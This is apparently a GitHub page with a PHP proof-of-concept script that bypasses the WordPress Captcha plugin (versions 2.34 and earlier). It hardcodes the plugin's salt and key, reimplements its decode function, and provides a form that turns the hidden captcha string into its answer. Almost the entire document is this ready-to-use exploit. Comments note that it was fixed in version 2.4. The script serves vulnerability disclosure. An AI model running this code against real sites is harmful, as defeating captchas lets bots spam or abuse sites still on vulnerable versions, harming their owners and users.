Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
44 lines (39 sloc) 1.2 KB
<?php
//WordPress Captcha plugin 2.34 and previous allow to bypass captcha
//Vulnerables versions: 2.34 and previous
//Fixed in: 2.4 (corrected before disclosure - key & salt have been changed)
//Plugin page: https://wordpress.org/plugins/captcha
function decode( $String, $Key ) {
if ( ! $Key ) die ( __( "The password of decoding is not set", 'captcha' ) );
$Salt = 'BGuxLWQtKweKEMV4';
$StrLen = strlen( $String );
$Seq = $Key;
$Gamma = '';
while ( strlen( $Gamma ) < $StrLen ) {
$Seq = pack( "H*", sha1( $Seq . $Gamma . $Salt ) );
$Gamma.= substr( $Seq, 0, 8 );
}
$String = base64_decode( $String );
$String = $String^$Gamma;
$DecodedString = substr( $String, 1 );
$Error = ord( substr( $String, 0, 1 ) ^ substr( pack( "H*", sha1( $DecodedString ) ), 0, 1 ));
if ( $Error )
return false;
else
return $DecodedString; }
?>
<html>
<head><title>WP Plugin Captcha Decoder</title></head>
<body>
<form method="POST">
Hidden string: <br />
<input type="text" name="hidden_string" /> <br/>
<input type="Submit" value="calculate" />
</form>
<?php
$str_key = "123";
if (isset($_POST['hidden_string']))
echo trim( decode( $_POST['hidden_string'], $str_key ) ) ;
?>
</body>
</html>